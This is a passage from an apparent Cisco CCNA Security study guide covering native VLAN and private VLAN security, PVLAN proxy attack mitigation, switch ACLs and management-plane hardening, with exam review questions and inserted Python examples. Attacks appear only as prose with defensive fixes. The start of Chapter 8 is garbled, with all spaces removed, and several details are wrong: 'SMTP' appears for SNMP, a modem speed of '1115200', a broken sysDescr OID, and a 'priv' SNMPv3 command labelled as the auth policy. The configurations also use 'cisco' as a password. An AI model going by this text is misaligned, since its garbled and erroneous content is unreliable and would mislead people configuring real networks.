14. What is the purpose of the command ip dhcp snooping database flash:/mysnooper?
A. The switch will retain the database through a reboot.
B. The switch will share the database with directly connected switches.
C. The switch will apply the database to all VLANs.
D. The switch will delete the file during a reboot.
15. What is the default state of a port with respect to DAI?
A. Trusted
B. Untrusted
C. Null
D. Nonegotiate
16. In the following command, what is the name of the ACL? SW69(config)#ip arp inspection filter StaticIP-VLAN3 vlan 3
A. vlan 3
B. 3
C. StaticIP-VLAN3
D. filter StaticIP
17. Which command enables port security on an interface?
A. switchport port-security
B. switchport port-security maximum 2
C. switchport port-security violation shutdown
D. switchport port-security mac-address sticky
18. Which of the following is not a mitigation to STP attacks?
A. Root Guard
B. BPDU Guard
C. Disabling DTP
D. DAI
19. When a violation occurs on a BPDU Guard–enabled port, in what state is the port placed?
A. Shutdown
B. Port inconsistent
C. Err-disabled
D. Restrict
20. Which ports should have DTP disabled?
A. Access ports
B. Trunk ports
C. Etherchannels
D. All ports
Chapter 7
VLAN Security
CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:
4.6 VLAN security
Describe the security implications of a PVLAN
Describe the security implications of a native VLAN
VLANs can be used to segment a LAN and can span multiple switches, providing both security and the ability to locate users in the same VLAN in physically dispersed locations. There are security issues with VLANs, as you learned in Chapter 5. This chapter will expand your knowledge of VLAN issues by introducing private VLANs (PVLANs) and the security implications of deploying them. I will also talk about security issues with native VLANs. I'll wrap up the chapter by introducing how to use access lists on switches.
In this chapter, you will learn the following:
Security implications of a PVLAN
Security implications of a native VLAN
Switch ACLs
Native VLANs
In Chapter 5 you learned about double tagging and how an attacker can craft a packet with two 802.1q tags with the inner tag set to the VLAN to which he would like to send traffic. This attack takes advantage of the native VLAN. If the attacker's access port is set to the same VLAN as the native VLAN, this attack becomes possible.
Mitigation
The solution is to set the native VLAN (number 1 by default) to one in which none of the access ports resides. This is done only on the trunk ports. To change the native VLAN of the trunk port gi0/1 to 78, use the following command:
Switch79(config)#int gi0/1
Switch79(config-if)#switchport trunk native vlan 78
After changing the native VLAN from 1 to 78, simply ensure that no access ports are members of VLAN 78.
PVLANs
When hosts are segregated into VLANs, they are also placed into separate IP subnets. Service providers often find this arrangement to be problematic, especially when there is need for additional security across a VLAN being shared by multiple customers and perhaps by the ISP servers themselves. While a separate VLAN for each customer is an option, it presents the following challenges:
The requirement of a high number of interfaces on service provider devices to support the subnets
The increased management complexity of dividing the network address space and the potential wasting of address space
The management of multiple ACLs to maintain security across the VLANs
A feature that can be a solution in these cases is the implementation of private VLANs. These provide separation within a VLAN at layer 2, while still leaving all members of the original VLAN (called the primary VLAN) in the same subnet. Communication between ports in the primary VLAN is controlled not with ACLs but with the proper assignment of one of three port types.
Promiscuous ports These are ports that can communicate with a port of any other type. Typical candidates for this port assignment are those ports leading to the router or firewall that act as the default gateway for the primary VLAN.
Isolated ports These are ports that only communicate with a promiscuous port. These ports are used to isolate a single host from all other hosts in the primary VLAN. Since these ports can only communicate with promiscuous ports, the only way another host can communicate with an isolated port is through the router, where an ACL might be applied for control.
Community ports These are ports that can communicate with other members of the same community and with promiscuous ports. Therefore, hosts connected to community ports can communicate with other communities and with isolated ports only through the router.
Figure 7.1 shows an example of a primary VLAN that has been divided into PVLANs. In this example, keep in mind that all hosts connected to the switch are in the same primary VLAN and the same IP subnet. Port Ge0/1 is a promiscuous port, while the ports leading to SRV1 and SRV2 are community ports that are members of PVLAN 101. Notice they can communicate with one another and with the default gateway since it is a promiscuous port.
FIGURE 7.1 PVLANs
Also notice that the ports leading to SRV3 and SRV4 are isolated ports that are members of PVLAN 102. Notice that even though SRV3 and SRV4 reside in the same primary VLAN and the same secondary VLAN (102), they cannot communicate with one another because isolated ports can only communicate with the promiscuous port, which in this case is the default gateway.
To set up PVLANs, the steps include the following:
1. Configure the primary VLAN, specifying it as a primary PVLAN.
2. Configure any required secondary PVLANs, specifying the type.
3. Specify each interface as a private VLAN host port and associate it with a private VLAN pair.
The following are the steps to configure VLAN 10 as a primary VLAN, VLAN 201 as an isolated VLAN, and VLANs 202 and 203 as community VLANs; to associate them in a private VLAN; and to verify the configuration:
Switch#configure terminal
Switch(config)#vlan 10
Switch(config-vlan)#private-vlan primary
Switch(config-vlan)#exit
Switch(config)#vlan 201
Switch(config-vlan)#private-vlan isolated
Switch(config-vlan)#exit
Switch(config)#vlan 202
Switch(config-vlan)#private-vlan community
Switch(config-vlan)#exit
Switch(config)#vlan 203
Switch(config-vlan)#private-vlan community
Switch(config-vlan)#exit
Switch(config)#vlan 10
Switch(config-vlan)#private-vlan association 201-203
Switch(config-vlan)#end
Switch#show vlan private-vlan
Primary Secondary Type              Ports
------- --------- ----------------- ------------------------------------------
10      201       isolated
10      202       community
10      203       community
10      204       non-operational
Notice that the last command, private-vlan association 201-203, executed under the VLAN 10 configuration is what ties the PVLANs to the primary VLAN.
To set a port to its proper type and PVLAN, use this command:
Switch#configure terminal
Switch(config)#interface gigabitethernet 0/22
Switch(config-if)#switchport mode private-vlan host
Switch(config-if)#switchport private-vlan host-association 10 202
Switch(config-if)#end
In the previous configuration, port Gi0/22 was assigned to primary VLAN 10 and PVLAN 202. Since PVLAN 202 was created as a community VLAN, port Gi0/22 will be a community port.
PVLAN Edge
In some cases, you may find there is no reason for any communication between ports connected to the same switch. When that is the case, it may be beneficial to take advantage of another feature called the PVLAN Edge feature. Preventing communications between ports when possible can both prevent attacks such as ARP poisoning attacks and impair the ability of a hacker to move from a compromised host to other hosts.
When a port has been designated as a PVLAN Edge port (called a protected port), it has the following features:
No traffic will be sent from one protected port to another protected port on the same switch. Any data traffic must go through the router first.
Forwarding behavior between a protected port and unprotected ports proceeds as usual.
There is no isolation between protected ports located on different switches.
While PVLAN Edge is only effective between ports on the same switch, it is simpler to configure than PVLANs and can be the solution in certain cases. To specify a port as "protected," use the following command:
Switch(config)#interface fa0/1
Switch(config-if)#switchport protected
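The layer 2 reachability rules for the three PVLAN port types and for PVLAN Edge protected ports can be checked against a topology before any configuration is pushed. As an added example (not code from the book or from Cisco), the following Python model encodes those rules and applies them to the Figure 7.1 topology and to a constructed pair of protected ports; the "access" port kind, the switch names and the port names are assumptions of the model.

```python
"""Layer 2 reachability under private VLAN port types and PVLAN Edge (protected) ports."""
from dataclasses import dataclass
from itertools import combinations
from typing import Optional

PVLAN_TYPES = {"promiscuous", "isolated", "community"}


@dataclass(frozen=True)
class Port:
    name: str
    kind: str                        # "promiscuous" | "isolated" | "community" | "access"
    secondary: Optional[int] = None  # secondary PVLAN number for isolated/community ports
    switch: str = "SW1"              # assumed switch name; PVLAN Edge works per switch
    protected: bool = False          # PVLAN Edge: 'switchport protected'


def can_forward_l2(a: Port, b: Port) -> bool:
    """True if a frame entering port a can be switched directly to port b at layer 2.
    All ports are assumed to be in one primary VLAN and one IP subnet, as in Figure 7.1."""
    if a == b:
        return False
    # PVLAN Edge: two protected ports on the same switch never exchange traffic directly;
    # protected ports on different switches are not isolated from one another.
    if a.protected and b.protected and a.switch == b.switch:
        return False
    # Private VLAN port-type rules (both ports must carry a PVLAN type, or neither).
    if (a.kind in PVLAN_TYPES) != (b.kind in PVLAN_TYPES):
        raise ValueError("model does not mix PVLAN host ports with plain access ports")
    if "promiscuous" in (a.kind, b.kind):
        return True                      # promiscuous talks to every other port type
    if "isolated" in (a.kind, b.kind):
        return False                     # isolated talks to promiscuous ports only
    # Two community ports: same community only. Two plain access ports: forwards as usual.
    return a.secondary == b.secondary


def reachable_pairs(ports) -> list:
    """Unordered pairs of ports that can exchange traffic without going via the router."""
    return sorted((a.name, b.name) for a, b in combinations(ports, 2)
                  if can_forward_l2(a, b))


# Figure 7.1 topology as described in the chapter.
GATEWAY = Port("Ge0/1", "promiscuous")
SRV1 = Port("SRV1", "community", 101)
SRV2 = Port("SRV2", "community", 101)
SRV3 = Port("SRV3", "isolated", 102)
SRV4 = Port("SRV4", "isolated", 102)
FIGURE_7_1 = [GATEWAY, SRV1, SRV2, SRV3, SRV4]

if __name__ == "__main__":
    for pair in reachable_pairs(FIGURE_7_1):
        print("direct L2 path:", pair)
```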
PVLAN Proxy Attack
As with many features, malicious individuals have figured out a way to attack PVLAN configurations. In a PVLAN proxy attack, an attacker sends a packet (using the promiscuous port) with the source IP and MAC address of the attacker, a destination IP address of the target, and the MAC address of the router. When the router receives the packet, the router rewrites the destination MAC address to that of the target and sends the packet to the target. It is the presence of the MAC address of the router in the packet, rather than that of the target, that causes this to be possible. This causes the packet to be coming from the router, which is allowed since the router is on a promiscuous port. Since the router is being used as the source MAC, the router is considered a "proxy." Figure 7.2 shows the attack.
FIGURE 7.2 PVLAN proxy attack
Mitigation
To prevent PVLAN proxy attacks, implement ACLs on the router interface that deny traffic from the local subnet to the local subnet. An example of such an access list, applied to the router interface, would solve the issue shown in Figure 7.2.
Router(config)#access-list 101 deny ip 172.16.0.0 0.0.255.255 172.16.0.0 0.0.255.255
Router(config)#access-list 101 permit ip any any
Router(config)#int fa0/1
Router(config-if)#ip access-group 101 in
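As an added example (not from the book), this Python code evaluates access-list 101 above with Cisco wildcard-mask semantics against constructed packets, showing that a proxied local-subnet-to-local-subnet packet is denied on the router's inbound interface while traffic leaving the subnet is still permitted. The sample addresses are constructed within the 172.16.0.0/16 range used by the ACL.

```python
"""Evaluate a Cisco-style numbered IP ACL (wildcard masks) against sample packets."""
import ipaddress

ANY = ("0.0.0.0", "255.255.255.255")   # the 'any' keyword: every bit is don't-care


def _to_int(addr: str) -> int:
    return int(ipaddress.IPv4Address(addr))


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """Cisco wildcard semantics: 0 bits in the mask must match, 1 bits are ignored."""
    care = ~_to_int(wildcard) & 0xFFFFFFFF
    return (_to_int(addr) & care) == (_to_int(base) & care)


# access-list 101 from the mitigation above, one tuple per entry:
# (action, src, src-wildcard, dst, dst-wildcard)
ACL_101 = [
    ("deny",   "172.16.0.0", "0.0.255.255", "172.16.0.0", "0.0.255.255"),
    ("permit", *ANY, *ANY),
]


def evaluate(acl, src: str, dst: str) -> str:
    """First matching entry wins; every Cisco ACL ends with an implicit deny."""
    for action, s_base, s_wild, d_base, d_wild in acl:
        if wildcard_match(src, s_base, s_wild) and wildcard_match(dst, d_base, d_wild):
            return action
    return "deny"


def filter_inbound(acl, packets) -> dict:
    """Apply the ACL inbound to (src, dst) pairs; return {(src, dst): action}."""
    return {pkt: evaluate(acl, *pkt) for pkt in packets}


# Constructed packets: the proxied attacker->target packet (both in the local
# subnet) and two legitimate flows that cross the router.
SAMPLE_PACKETS = [
    ("172.16.1.10", "172.16.1.20"),   # attacker -> target via the router: denied
    ("172.16.1.10", "10.1.1.1"),      # local host -> remote network: permitted
    ("10.1.1.1", "172.16.1.20"),      # remote -> local (other direction): permitted
]

if __name__ == "__main__":
    for pkt, action in filter_inbound(ACL_101, SAMPLE_PACKETS).items():
        print(f"{pkt[0]:>12} -> {pkt[1]:<12} {action}")
```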
ACLs on Switches
Access lists can be applied not only to router interfaces but can also be used on layer 2 interfaces on switches. When used on switches, there are three types of access lists that can be used.
Port access lists (PACLs) These are applied to layer 2 interfaces either on a layer 2 switch or on a multilayer switch. When applied to a layer 2 interface on a multilayer switch, they can be applied only inbound. These lists can be either IP ACLs or MAC ACLs.
VLAN access lists (VACLs) These use maps to control traffic on a VLAN. They can be applied either to traffic routed into or out of a VLAN or to all traffic bridged within a VLAN.
Router ACLs Used to control traffic between VLANs, router ACLs can be applied either to a router interface or to a switched virtual interface (SVI) on a multilayer switch.
First let's look at configuring port ACLs.
Port ACLs
Port ACLs can be applied either as IP access lists or as MAC access lists. The procedure to create and apply both types is as follows:
Switch(config)#ip access-list extended simple-ip-acl
Switch(config-ext-nacl)#permit host 10.0.0.1 any
Switch(config)#int gi0/22
Switch(config-if)#ip access-group simple-ip-acl in
Switch(config)#mac access-list extended simple-mac-acl
Switch(config-ext-macl)#permit host 0000.aaaa.bbbb any
Switch(config)#int gi0/22
Switch(config-if)#mac access-group simple-mac-acl in
VLAN ACLs
VLAN access lists apply to all traffic in a VLAN and are not configured with a direction. These access lists use maps to define both the traffic in question and the action to be taken. The maps can reference other access lists when specifying these values. From a high level, the steps to set up a VACL are as follows:
1. Create an ACL that defines the specified traffic type.
2. Create a map that references the access list and specifies an action.
3. Apply the access map to the appropriate VLAN.
Here is the creation of an access list defining the traffic as HTTPS (port 443):
Switch(config)#ip access-list extended permit_HTTPS
Switch(config-ext-nacl)#permit tcp any any eq 443
The next step is to create the map referencing the ACL and specifying an action:
Switch(config)#vlan access-map Allow_HTTPS
Switch(config-access-map)#match ip address permit_HTTPS
Switch(config-access-map)#action forward
Finally, here is the command to apply the access map to a VLAN, in this case VLAN 403:
Switch(config)#vlan filter Allow_HTTPS vlan-list 403
Note that you use a VLAN list to specify the VLANs to which the map applies, even when the list consists of only one VLAN.
Summary
In this chapter, you learned about preventing VLAN hopping attacks that take advantage of the native VLAN. You also looked at how to break up a VLAN into private VLANs. You learned that configuring PVLANs is a matter of setting ports as promiscuous, community, and isolated.
The chapter discussed the PVLAN Edge feature as another way of providing isolation between switch ports. Finally, you learned how to use ACLs to prevent a PVLAN proxy attack.
Exam Essentials
Mitigate native VLAN security issues. Prevent VLAN hopping attacks that use double tagging by setting the native VLAN number to one in which none of the access ports reside.
Describe the benefits of PVLANs. These include the ability to segregate within a primary VLAN, while saving IP address space, decreasing management complexity, and reducing the need for multiple ACLs to maintain security across the VLANs.
Identify the port types used in PVLANs. These include promiscuous, community, and isolated ports. They allow for grouping devices within a VLAN (community), for isolating devices within a VLAN (isolated), and for providing access to all devices back to the router (promiscuous).
Explain the functionality of the PVLAN Edge feature. This feature is used to provide isolation between protected ports located on the same switch.
Mitigate a PVLAN proxy attack. To prevent PVLAN proxy attacks, implement ACLs on the router interface that deny traffic from the local subnet to the local subnet.
Review Questions
1. Which of the following attacks takes advantage of the native VLAN?
A. Double tagging
B. ARP poisoning
C. Buffer overflow
D. PVLAN proxy
2. How should the native VLAN be configured to thwart a double tagging attack?
A. It should be disabled.
B. It should be the same VLAN number where hosts reside.
C. It should be the same as the management VLAN.
D. It should be set to a VLAN number in which none of the access ports reside.
3. Which of the following is not true about service providers providing a separate VLAN per customer?
A. It requires a high number of interfaces on service provider devices to support the subnets.
B. It increases management complexity of dividing the network address space and the potential wasting of address space.
C. Multiple ACLs must be managed to maintain security across the VLANs.
D. It decreases security.
4. What feature allows for providing layer 2 separation within a VLAN?
A. PVLANs
B. Loop Guard
C. DAI
D. Root Guard
5. Which of the following commands changes the native VLAN from 1 to 78?
A. switchport trunk native vlan 78
B. switchport native vlan 78
C. switchport native vlan trunk 78
D. switchport vlan 78
6. Which type of PVLAN port can communicate with a port of any other type?
A. Promiscuous
B. Isolated
C. Community
D. Private
7. Which of the following is not a step in setting up PVLANs?
A. Configuring the primary VLAN, specifying it as a primary PVLAN
B. Specifying each interface as a private VLAN host port and associating it with a private VLAN pair
C. Configuring any required secondary PVLANs, specifying the type
D. Setting the native VLAN number to one in which none of the access ports resides
8. Which of the following commands configures the primary PVLAN?
A. primary-vlan primary
B. private-vlan private
C. private-vlan primary
D. vlan primary
9. To what port state should the default gateway port be set?
A. Promiscuous
B. Isolated
C. Community
D. Private
10. Which command associates two private VLANs with the primary VLAN?
A. vlan association 501-503
B. private-vlan 501-503
C. private-vlan association 501-503
D. private-vlan 501-503 associate
11. Which command sets a port as a PVLAN port?
A. switchport mode private-vlan host
B. switchport private-vlan host-association 10 202
C. switchport host-association 10 202
D. switchport mode host-association 10 202
12. Which of the following commands assigns a PVLAN port to its PVLAN?
A. switchport mode private-vlan host
B. switchport private-vlan host-association 10 202
C. switchport host-association 10 202
D. switchport mode host-association 10 202
13. Which type of attack can be prevented by the PVLAN Edge feature?
A. Double tagging
B. ARP poisoning
C. Buffer overflow
D. PVLAN proxy
14. What is the purpose of the following set of commands?
Switch(config)#vlan 10
Switch(config-vlan)#private-vlan association 501
A. Ties the PVLAN 10 to the primary VLAN 501
B. Ties the PVLAN 501 to the PVLAN 10
C. Ties PVLAN 501 to the primary VLAN 10
D. Ties the PVLAN 10 to the secondary VLAN 501
15. What statement is false about the PVLAN Edge feature?
A. No traffic will be sent from one protected port to another protected port on the same switch.
B. Forwarding behavior between a protected port and unprotected ports proceeds as usual.
C. There is no isolation between protected ports located on different switches.
D. Forwarding between a protected port and unprotected ports is not permitted.
16. What is a port protected by the PVLAN Edge feature called?
A. Isolated
B. Protected
C. Hidden
D. Promiscuous
17. Which command specifies a port as PVLAN Edge?
A. switchport protected
B. switchport edge
C. switchport security edge
D. switchport protected edge
18. Which of the following describes a packet sent by an attacker attempting the PVLAN proxy attack?
A. It contains a source IP and MAC address of the attacker, a destination IP address of the target, and a destination MAC address of the router.
B. It contains a source MAC address of the attacker and source IP address of the target, a destination IP address of the target, and the IP address and MAC address of the router.
C. It contains a source IP address of the attacker and source MAC address of the target, a destination IP address of the target, and the MAC address of the router.
D. It contains a source IP and MAC address of the attacker, a destination IP address of the target, and the MAC address of the router.
19. In a PVLAN proxy attack, which device is acting as the proxy?
A. The target
B. The attacker
C. The router
D. The switch
20. How are PVLAN proxy attacks prevented?
A. Implement ACLs on the router interface that allow traffic from the local subnet to the local subnet
B. Implement ACLs on the router interface that deny traffic from remote subnets to the local subnet
C. Implement ACLs on the router interface that deny traffic from the local subnet to remote subnets
D. Implement ACLs on the router interface that deny traffic from the local subnet to the local subnet
Chapter8SecuringManagementTrafficCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
2.1Securemanagement
Comparein-bandandout-of-band
Configuresecurenetworkmanagement
ConfigureandverifysecureaccessthroughSNMPv3usinganACL
ConfigureandverifysecurityforNTP
UseSCPforfiletransfer
Controllingaccesstothemanagementinterfaceofarouterorswitchiscriticaltoensuringthatthereisnounauthorizedaccessthatcanintroducemaliciouschangestotheconfigurationofthedevice.Moreover,whennetworkmanagementandtimesynchronizationprotocolssuchasSMTPandNTPareinuse,accesstothisinformationmustbesecured.Finally,asatechnician,youshouldusesecureprotocolswhenperformingfiletransfers.Thischapterwillcoverallofthesesecuremanagementtopics.
Inthischapter,youwilllearnthefollowing:
Comparingin-bandandout-of-band
Configuringsecurenetworkmanagement
ConfiguringandverifyingsecureaccessthroughSNMPv3usinganACL
ConfiguringandverifyingsecurityforNTP
UsingSCPforfiletransfer
In-BandandOut-of-BandManagementManyoptionsareavailabletoconnecttoaCiscodeviceformanagingthedevice.Methodscanbeclassifiedaseitherin-bandorout-of-band.Anin-bandconnectionisonethatusesthenetworkasitstransmissionmedium.In-bandconnectiontypesincludeSNMP,virtualterminal(VTY),andHTTPSconnections.Out-of-bandconnectionsincludetheconsoleportandthe
AUXport,bothphysicalconnectionsthatdonotusethenetworkasthetransmissionmedium.Itisgoodpracticetohavebothin-bandandout-of-bandmethodsavailableforredundancy.
AUXPortTheAUXportcomprisesadirectserialconnectiontothedeviceandisconsideredanout-of-bandmethodofmanagingthedevice.OneoptionistoconnectamodemtotheAUXportanddialintothemodemwhenaccesstotheCLIisrequiredandwhennetworkaccessisnotavailable.TosetuptheAUXportforthisandtoalsosetapasswordfortheAUXport,youneedtoknowthelinenumberusedbytheAUXport.Thiscanbedeterminedwiththeshowlinecommand,asshownhere:
R1#showline
TtyTypTx/RxAModemRotyAccOAccIUsesNoiseOverrunsInt
*0CTY-----000/0
-
65AUX9600/9600-----010/0
-
66VTY-----000/0
-
67VTY-----000/0
-
Inthepreviousoutput,theAUXportisusingline65,whichyouwillneedtoreferenceinthefollowingsetofcommands,whichsettheAUXporttouseamodemwithaspeedof1115200.Thecommandsalsosettheflowcontroltohardwareandsetthepasswordtocisco.Don’tforgetthelogincommand,whichisthecommandthatspecifiesaskingforapasswordatconnectiontime!
R1#conft
R1(config)#line65
R1(config-line)#modeminout
R1(config-line)#speed115200
R1(config-line)#transportinputall
R1(config-line)#flowcontrolhardware
R1(config-line)#login
R1(config-line)#passwordcisco
R1(config-line)#end
VTY Ports

The virtual terminal (VTY) ports are considered an in-band method, as these connections use the network as the transmission medium. These ports can use several protocols, among them Telnet and SSH. While you will learn later in the chapter to configure the secure alternative to clear-text Telnet, here I will cover securing the lines with passwords and adding physical redundancy to the connections by setting a loopback address. When a loopback address is configured and used as the management IP address, any physical interface on the device can accept the connection attempt if the loopback address is included in dynamic routing advertisements or advertised via a static route. When management access is tied to a physical IP address, the device will be unreachable when that physical interface is down.

To configure a loopback address for management, use the following commands:

R1(config)# int loopback 0
R1(config-if)# ip address 192.168.5.5 255.255.255.0
R1(config-if)# no shut

To include the IP address in EIGRP or OSPF routing advertisements, use the following commands. This will ensure that you can reach this address from a remote network. (OSPF also requires the area in which the network is placed; area 0 is used here.)

R1(config)# router eigrp 10
R1(config-router)# network 192.168.5.0 0.255.255.255
R1(config)# router ospf 1
R1(config-router)# network 192.168.5.0 0.255.255.255 area 0

Before setting a password on the VTY lines, you should determine how many of these lines exist on the device (which varies) so that you secure them all. Use this command to learn the number of VTY lines:

R1(config)# line vty ?
  <0-15>  First Line number

Now you know there are 16 lines on this device, so refer to 16 lines when you execute any command designed to apply to all VTY lines. To set a password on the VTY lines, use the following set of commands:

R1(config)# line vty 0 15
R1(config-line)# password cisco
R1(config-line)# login
HTTPS Connection

Many Cisco devices offer the option of managing the device from a GUI interface. This would be considered an in-band connection, as it uses the network. While the initial configuration must be completed at the CLI, once an interface has been assigned an IP address and is functional and the HTTP or HTTPS server has been enabled, these devices can be managed using this interface. While the HTTP server is certainly functional, when managing the device you should always use a secure connection as provided with HTTPS. Later in this chapter, you will learn how to configure HTTPS.
SNMP

Another option for configuration management is SNMP. As with other methods that use the network as a transmission medium, it is also considered an in-band method. SNMP stores the settings in a MIB. This is a repository with a hierarchical structure with standardized locations for each piece of configuration or status information. These locations and their associated data are called OIDs. The OID number describes the path through the tree-like structure where the specific piece of information is located. Figure 8.1 shows a portion of the MIB. An example of an OID would be 1.3.6.1.2.1.1.5 (system name), which would be one of the subsections of sysDescr (1.3.6.2.1.1).

FIGURE 8.1 Partial MIB

Notice also that there is a private branch in the tree where vendors can include settings and status information that might be unique to their products. Therefore, the path to Cisco-specific data is 1.3.6.1.4.1.9. Access to information stored by an individual device is done using get or set commands while referencing the OID. get commands retrieve information, while set commands make configuration changes to OIDs that can be changed. SNMP also allows for the creation of traps on devices, which can trigger a message to the management station when a threshold is met or an event occurs. In SNMP version 2, these trap messages are called informs.

SNMP has gone through three versions over the years. Versions 1 and 2 used knowledge of a community string as the access control mechanism to the MIBs of the devices. As this is quite a flimsy security system, version 3 adopted a user-based security model that provides for authentication, integrity hashing, and encryption of transmissions. These functions can be configured using three modes that represent various combinations of these capabilities.

noAuthNoPriv: No hashing to secure authentication or encryption of data (referenced as noauth in the command)
AuthNoPriv: Hashing to secure authentication but no encryption of data (referenced as auth in the command)
AuthPriv: Hashing to secure authentication and encryption of data (referenced as priv in the command)

Later in this chapter, you will learn how to configure SNMPv3.
Console Port

The console port also comprises a serial connection that is considered an out-of-band connection. Access control can be applied to this interface by using the line console 0 command. For example, here I have applied a password to this single line and, by using the login command, have specified that the password is required:

R83(config)# line console 0
R83(config-line)# password cisco
R83(config-line)# login
Securing Network Management

Regardless of the interface with which you manage a Cisco device, you should ensure that the method used is secure. In this section, you'll look at securing VTY ports and HTTP connections and using ACLs as a further line of defense in protecting these critical management interfaces. Finally, I'll discuss banner messages and the role they can play in securing management interfaces.

SSH

When accessing a device using the VTY ports, you should always configure and use SSH rather than Telnet for the connection. For more information on configuring SSH, see Chapter 4.

HTTPS

To disable the HTTP server and enable the HTTPS server, execute the following commands:

R81(config)# no ip http server
R81(config)# ip http secure-server
R81(config)# copy run start

Once these commands are executed, the device will generate an RSA key and will use the key to encrypt all transmissions.
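The settings covered so far (a password and login on every console, AUX, and VTY line, the clear-text HTTP server disabled, and the HTTPS server enabled) are easy to check mechanically. The following Python script is an added example, not from the book or from Cisco; it audits a constructed running-config excerpt and reports each line or global setting that falls short, and it accepts `login local` on a line as satisfied because AAA then supplies the credentials.

```python
"""Audit an IOS running-config excerpt for the management-plane settings
discussed in the text. Both configurations below are constructed samples."""

# Constructed: one gap of each kind, so the audit has something to report.
SAMPLE_CONFIG = """\
hostname R1
ip http server
!
line con 0
 password cisco
 login
line aux 0
 password cisco
line vty 0 4
 login local
line vty 5 15
 password cisco
!
end
"""

# Constructed: the same device after the gaps are closed.
HARDENED_CONFIG = """\
hostname R1
no ip http server
ip http secure-server
!
line con 0
 password cisco
 login
line aux 0
 password cisco
 login
line vty 0 4
 login local
line vty 5 15
 password cisco
 login
!
end
"""


def parse_lines(config):
    """Return {'line con 0': [subcommands], ...} for every 'line ...' stanza."""
    stanzas = {}
    current = None
    for raw in config.splitlines():
        if raw.startswith("line "):
            current = raw.strip()
            stanzas[current] = []
        elif raw.startswith(" ") and current is not None:
            stanzas[current].append(raw.strip())
        else:
            current = None   # any other top-level command ends the stanza
    return stanzas


def audit_management(config):
    """Return a sorted list of findings; an empty list means every check passed."""
    findings = []
    for name, cmds in parse_lines(config).items():
        # 'login local' / 'login authentication ...' hand the line to AAA instead.
        if any(c.startswith(("login local", "login authentication")) for c in cmds):
            continue
        if "login" not in cmds:
            findings.append(f"{name}: no 'login' command, password is never requested")
        if not any(c.startswith("password ") for c in cmds):
            findings.append(f"{name}: no password set")
    global_cmds = [l.strip() for l in config.splitlines() if not l.startswith(" ")]
    if "ip http server" in global_cmds:
        findings.append("ip http server: clear-text HTTP management is enabled")
    if "ip http secure-server" not in global_cmds:
        findings.append("ip http secure-server: HTTPS management is not enabled")
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit_management(SAMPLE_CONFIG):
        print(finding)
    print("hardened config findings:", audit_management(HARDENED_CONFIG))
```

Run against the first sample, the audit reports the AUX line and the second VTY range as lacking `login`, the HTTP server as enabled, and the HTTPS server as missing; the hardened sample produces no findings.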
ACLs

An additional layer of security that can be applied to any management interface is the application of ACLs. After the ACL has been created, it can be applied to the VTY, HTTPS, and SNMPv3 processes. For example, consider the following access list that allows access only to and from hosts in the 192.168.5.0/24 network (presumably one that contains only management stations).

R84(config)# access-list 99 permit 192.168.5.0 0.0.0.255

This ACL can be applied to each of these management interfaces as follows:

SSH

R84(config)# line vty 0 15
R84(config-line)# access-class 99 in

HTTPS

R84(config)# ip http access-class 99

SNMPv3

To apply ACL 99 at the group level, use this command, which refers to the group test-group using the priv security policy with write access to a view called write-view:

R84(config)# snmp-server group test-group v3 priv write write-view access 99

To apply ACL 99 at the user level, use the following command, which refers to a user named nms-user who is a member of the group nms-group using the auth security policy. This policy uses SHA hashing for authentication with a shared secret of auth-pass. It uses 128-bit AES for encryption using a shared secret of priv-pass. The 99 at the end of the command is the reference to controlling access with ACL 99.

R84(config)# snmp-server user nms-user nms-group v3 auth sha auth-pass priv aes 128 priv-pass access 99
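To see what the router actually does with ACL 99 once it is bound to the VTY, HTTPS, or SNMP process, the following Python code is an added example (not from the book) that evaluates a standard ACL the way IOS does: entries are tested in order, the wildcard mask marks the bits that may differ, and a source that matches nothing falls to the implicit deny at the end of every ACL. It also handles the `host` and `any` forms of a standard entry, which the text does not show. The connection attempts are constructed.

```python
import ipaddress


def wildcard_match(addr, network, wildcard):
    """True if addr equals network on every bit the wildcard mask leaves as 0."""
    a = int(ipaddress.IPv4Address(addr))
    n = int(ipaddress.IPv4Address(network))
    care = 0xFFFFFFFF ^ int(ipaddress.IPv4Address(wildcard))  # bits that must match
    return (a & care) == (n & care)


def parse_standard_acl(lines):
    """Parse 'access-list N permit|deny <source>' entries; the source may be
    'any', 'host A.B.C.D', or 'A.B.C.D W.X.Y.Z' (address plus wildcard mask)."""
    entries = []
    for line in lines:
        parts = line.split()
        number, action, source = int(parts[1]), parts[2], parts[3:]
        if source[0] == "any":
            network, wildcard = "0.0.0.0", "255.255.255.255"
        elif source[0] == "host":
            network, wildcard = source[1], "0.0.0.0"
        else:
            network = source[0]
            wildcard = source[1] if len(source) > 1 else "0.0.0.0"
        entries.append((number, action, network, wildcard))
    return entries


def evaluate(entries, source_ip):
    """First matching entry wins; a source matching no entry is denied (implicit deny)."""
    for _, action, network, wildcard in entries:
        if wildcard_match(source_ip, network, wildcard):
            return action
    return "deny"


# The ACL from the text, parsed from its CLI form.
ACL_99 = parse_standard_acl(["access-list 99 permit 192.168.5.0 0.0.0.255"])

# Constructed connection attempts against the VTY/HTTPS/SNMP processes.
SAMPLE_SOURCES = {
    "192.168.5.20": "permit",   # a management station inside 192.168.5.0/24
    "192.168.6.20": "deny",     # neighbouring subnet: implicit deny
    "10.0.0.1": "deny",
}


def check_samples():
    """Evaluate every constructed source against ACL 99."""
    return {src: evaluate(ACL_99, src) for src in SAMPLE_SOURCES}
```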
Banner Messages

While banner messages will never prevent unauthorized access to a device, they should be implemented to provide legal notice to unauthorized individuals that they are breaking the law when attempting to achieve unauthorized access. While the specific wording required for this varies from jurisdiction to jurisdiction, there are some general guidelines regarding this wording.

Use of words such as Welcome may be used later as a defense that access was encouraged.
If you plan to use AAA accounting records in any subsequent legal proceeding, you must inform intruders they are being audited.
You should always state the owner of the system so there will be no later defense that the intruder was unaware of the system owner.
To prevent any future defense that permission was implied, always state "authorized access only."

There are three types of banner message, and they differ in when they are displayed. Let's look at configuring each type and discuss when they will appear. The messages used do not constitute any recommendations as to wording.

Message of the Day (MOTD)

A message of the day (MOTD) appears at connection time and before the login banner (if configured). It may be used to communicate scheduled maintenance windows or other general information. To create a message that says "We will be down for 2 hours at 12 p.m.," use the following command. The message can be surrounded with any character (in this case ') as long as that character does not appear in the message.

R85(config)# banner motd '
Enter TEXT message.  End with the character '''.
We will be down for 2 hours at 12 PM.'

EXEC Banner

